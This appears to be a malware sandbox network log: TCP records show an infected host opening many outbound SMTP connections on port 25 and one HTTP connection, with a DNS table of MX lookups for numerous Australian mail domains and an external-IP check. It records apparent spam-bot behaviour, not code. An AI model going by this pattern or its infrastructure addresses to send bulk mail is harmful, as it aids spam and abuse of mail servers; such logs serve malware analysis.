                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.102336884 CET2550170142.251.8.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.121340990 CET5016625192.168.2.3103.42.110.229
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.122283936 CET5017025192.168.2.3142.251.8.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.154733896 CET255013252.62.125.178192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.161115885 CET255018467.195.204.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.162559986 CET255018467.195.204.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.162748098 CET5018425192.168.2.367.195.204.74
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.183250904 CET255018698.136.96.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.198208094 CET5013225192.168.2.352.62.125.178
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.198400974 CET5018425192.168.2.367.195.204.74
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.198672056 CET5018625192.168.2.398.136.96.74
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.209271908 CET5018725192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.221807003 CET255017867.195.228.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.242911100 CET5018825192.168.2.398.136.96.75
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.244551897 CET2550182173.194.202.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.248982906 CET2550182173.194.202.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.252475977 CET5018225192.168.2.3173.194.202.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.312446117 CET255018467.195.204.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.325745106 CET2550168104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.326531887 CET2550168104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.326711893 CET5016825192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.336330891 CET2550177203.30.68.68192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.337052107 CET2550177203.30.68.68192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.337615967 CET5017725192.168.2.3203.30.68.68
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.339503050 CET255018698.136.96.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.339529037 CET255018698.136.96.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.339783907 CET5018625192.168.2.398.136.96.74
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.342206955 CET5018925192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.346704960 CET2550180104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.346901894 CET5018025192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.385860920 CET255018898.136.96.75192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.388103008 CET2550166103.42.110.229192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.388330936 CET5016625192.168.2.3103.42.110.229
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.390527964 CET5018825192.168.2.398.136.96.75
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.438127995 CET2550170142.251.8.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.451076984 CET2550182173.194.202.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.451360941 CET5018225192.168.2.3173.194.202.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.456228018 CET255018967.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.456343889 CET5018925192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.457051039 CET5019025192.168.2.367.195.228.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.476618052 CET255013252.62.125.178192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.476754904 CET5013225192.168.2.352.62.125.178
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.481379986 CET255018698.136.96.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.481539965 CET255018698.136.96.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.485691071 CET5018625192.168.2.398.136.96.74
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.489061117 CET2550187104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.489326954 CET5018725192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.535092115 CET5018625192.168.2.398.136.96.74
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.563515902 CET255018898.136.96.75192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.563646078 CET5018825192.168.2.398.136.96.75
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.627048016 CET2550177203.30.68.68192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.627983093 CET2550180104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.632103920 CET255019067.195.228.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.635102034 CET5019025192.168.2.367.195.228.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.641643047 CET2550183203.36.137.234192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.641791105 CET2550183203.36.137.234192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.641921997 CET5018325192.168.2.3203.36.137.234
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.653789997 CET2550182173.194.202.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.662056923 CET2550182173.194.202.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.666367054 CET5018025192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.666488886 CET5018325192.168.2.3203.36.137.234
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.667061090 CET5018225192.168.2.3173.194.202.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.676127911 CET255018698.136.96.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.681700945 CET255018967.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.681819916 CET5018925192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.705723047 CET255018898.136.96.75192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.705758095 CET255018898.136.96.75192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.740989923 CET2550170142.251.8.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.744432926 CET5018825192.168.2.398.136.96.75
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.744477034 CET5017025192.168.2.3142.251.8.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.748275995 CET5019125192.168.2.3143.95.39.218
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.795828104 CET255018967.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.795866966 CET255018967.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.797821999 CET5018925192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.865751982 CET2550182173.194.202.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.867664099 CET5018225192.168.2.3173.194.202.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.880089045 CET2550052211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.883763075 CET255019067.195.228.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.884941101 CET5005225192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.885088921 CET5019025192.168.2.367.195.228.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.886986017 CET255018898.136.96.75192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.887017965 CET255018898.136.96.75192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.887120008 CET5018825192.168.2.398.136.96.75
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.888674974 CET2550187104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.888691902 CET5018825192.168.2.398.136.96.75
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.888940096 CET5018725192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.894568920 CET2550191143.95.39.218192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.894781113 CET5019125192.168.2.3143.95.39.218
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.909414053 CET2550177203.30.68.68192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.909729004 CET5017725192.168.2.3203.30.68.68
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.912287951 CET255018967.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.912322998 CET255018967.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.912456989 CET5018925192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.912693977 CET5018925192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.947884083 CET2550180104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.995060921 CET2550183203.36.137.234192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.995229006 CET5016425192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.995238066 CET5018025192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.026618004 CET255018967.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.030664921 CET255018898.136.96.75192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.060026884 CET255019067.195.228.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.060064077 CET255019067.195.228.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.060079098 CET2550170142.251.8.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.104566097 CET5016525192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.109353065 CET255016467.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.109602928 CET5016425192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.169015884 CET2550187104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.178942919 CET2550170142.251.8.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.182707071 CET5019025192.168.2.367.195.228.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.190917969 CET2550052211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.191768885 CET2550052211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.199388027 CET2550177203.30.68.68192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.199563980 CET5017725192.168.2.3203.30.68.68
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.292120934 CET5018725192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.292124987 CET5017025192.168.2.3142.251.8.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.293106079 CET5005225192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.337533951 CET255016467.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.495260000 CET5016425192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.680046082 CET5018025192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.680453062 CET5019025192.168.2.367.195.228.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.680495024 CET5016425192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.680535078 CET5018725192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.680624008 CET5005225192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.681616068 CET5014325192.168.2.3116.50.58.190
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.681654930 CET5014325192.168.2.3116.50.58.190
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.681654930 CET5014325192.168.2.3116.50.58.190
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.681746960 CET5014325192.168.2.3116.50.58.190
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.681746960 CET5014325192.168.2.3116.50.58.190
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.681783915 CET5014325192.168.2.3116.50.58.190
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.681783915 CET5014325192.168.2.3116.50.58.190
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.681783915 CET5014325192.168.2.3116.50.58.190
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.711247921 CET5014325192.168.2.3116.50.58.190
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.711678028 CET5014325192.168.2.3116.50.58.190
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.794451952 CET255016467.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.794487000 CET255016467.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.795736074 CET5016425192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.855943918 CET255019067.195.228.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.855979919 CET255019067.195.228.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.856137037 CET5019025192.168.2.367.195.228.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.876676083 CET5019025192.168.2.367.195.228.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.910152912 CET255016467.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.910188913 CET255016467.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.910326004 CET5016425192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.913218021 CET5016425192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.960133076 CET2550180104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.960668087 CET2550187104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.961000919 CET2550180104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.961077929 CET5018025192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.990128994 CET5018725192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.002912045 CET2550143116.50.58.190192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.023554087 CET5015780192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.025588036 CET5019225192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.025716066 CET2550052211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.027388096 CET255016467.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.032350063 CET2550143116.50.58.190192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.033631086 CET2550052211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.051893950 CET255019067.195.228.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.084439993 CET5005225192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.089695930 CET8050157185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.089782000 CET8050157185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.089850903 CET5015780192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.107361078 CET5019325192.168.2.398.136.96.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.223855972 CET5019425192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.251251936 CET255019398.136.96.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.251456022 CET5019325192.168.2.398.136.96.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.265075922 CET2550009101.0.80.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.270894051 CET2550187104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.304898024 CET2550192104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.305072069 CET5019225192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.308299065 CET5000925192.168.2.3101.0.80.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.308337927 CET5018725192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.337703943 CET255019467.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.337882996 CET5019425192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.390533924 CET2550052211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.395173073 CET2550052211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.395201921 CET2550052211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.395267010 CET5005225192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.395365000 CET5005225192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.203164101 CET192.168.2.38.8.8.80xa722Standard query (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.333470106 CET192.168.2.38.8.8.80x9a79Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.158926010 CET192.168.2.38.8.8.80x504dStandard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.154777050 CET192.168.2.38.8.8.80x3fdcStandard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.180911064 CET192.168.2.38.8.8.80xe0Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.209085941 CET192.168.2.38.8.8.80xee39Standard query (0)oic.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.338854074 CET192.168.2.38.8.8.80x9fedStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.385164976 CET192.168.2.38.8.8.80x472cStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.403748035 CET192.168.2.38.8.8.80xe991Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.436556101 CET192.168.2.38.8.8.80x17bdStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.502588987 CET192.168.2.38.8.8.80xb8f7Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.527146101 CET192.168.2.38.8.8.80x2bdaStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.555118084 CET192.168.2.38.8.8.80x19beStandard query (0)nwqphc.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.666054964 CET192.168.2.38.8.8.80x9a74Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.667061090 CET192.168.2.38.8.8.80xa64cStandard query (0)nwqphc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.792160988 CET192.168.2.38.8.8.80x7a7dStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.892620087 CET192.168.2.38.8.8.80x2323Standard query (0)britanniatravel.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.033390045 CET192.168.2.38.8.8.80x4a40Standard query (0)bwcl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.072959900 CET192.168.2.38.8.8.80x3986Standard query (0)free.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.097117901 CET192.168.2.38.8.8.80xfabdStandard query (0)bwcl-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.103765965 CET192.168.2.38.8.8.80x914dStandard query (0)mx1.free.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.218718052 CET192.168.2.38.8.8.80x8204Standard query (0)sydneywater.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.221437931 CET192.168.2.38.8.8.80xe955Standard query (0)britanniatravel.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.241756916 CET192.168.2.38.8.8.80xe844Standard query (0)sydneywater-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.399674892 CET192.168.2.38.8.8.80xcda1Standard query (0)dws.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.433501959 CET192.168.2.38.8.8.80xb160Standard query (0)penfold.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.455905914 CET192.168.2.38.8.8.80xc7e2Standard query (0)dws-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.551629066 CET192.168.2.38.8.8.80x2dbcStandard query (0)eu-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.555767059 CET192.168.2.38.8.8.80x7116Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.576417923 CET192.168.2.38.8.8.80xc1d5Standard query (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.666234970 CET192.168.2.38.8.8.80xa902Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.670566082 CET192.168.2.38.8.8.80x427eStandard query (0)mx.syd.iprimus.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.681926012 CET192.168.2.38.8.8.80x117dStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.782871008 CET192.168.2.38.8.8.80xf39aStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.783106089 CET192.168.2.38.8.8.80x65fdStandard query (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.884043932 CET192.168.2.38.8.8.80xa66Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.886276960 CET192.168.2.38.8.8.80xd3a6Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.026866913 CET192.168.2.38.8.8.80xaaf7Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.161597967 CET192.168.2.38.8.8.80x27c8Standard query (0)mq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.225732088 CET192.168.2.38.8.8.80x8c45Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.230506897 CET192.168.2.38.8.8.80x82Standard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.370026112 CET192.168.2.38.8.8.80x86ebStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.372874975 CET192.168.2.38.8.8.80xb1f8Standard query (0)abc.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.380523920 CET192.168.2.38.8.8.80x5e12Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.470102072 CET192.168.2.38.8.8.80xcf8bStandard query (0)mxb-0036d701.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.473242998 CET192.168.2.38.8.8.80x290eStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.474319935 CET192.168.2.38.8.8.80xa262Standard query (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.502691031 CET192.168.2.38.8.8.80x970bStandard query (0)extmail.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.712342024 CET192.168.2.38.8.8.80x54deStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.730068922 CET192.168.2.38.8.8.80xd7c3Standard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.919980049 CET192.168.2.38.8.8.80xf6d1Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.999151945 CET192.168.2.38.8.8.80x6894Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.015240908 CET192.168.2.38.8.8.80xff36Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.040276051 CET192.168.2.38.8.8.80xb79dStandard query (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.129448891 CET192.168.2.38.8.8.80x2427Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.220268965 CET192.168.2.38.8.8.80x6596Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
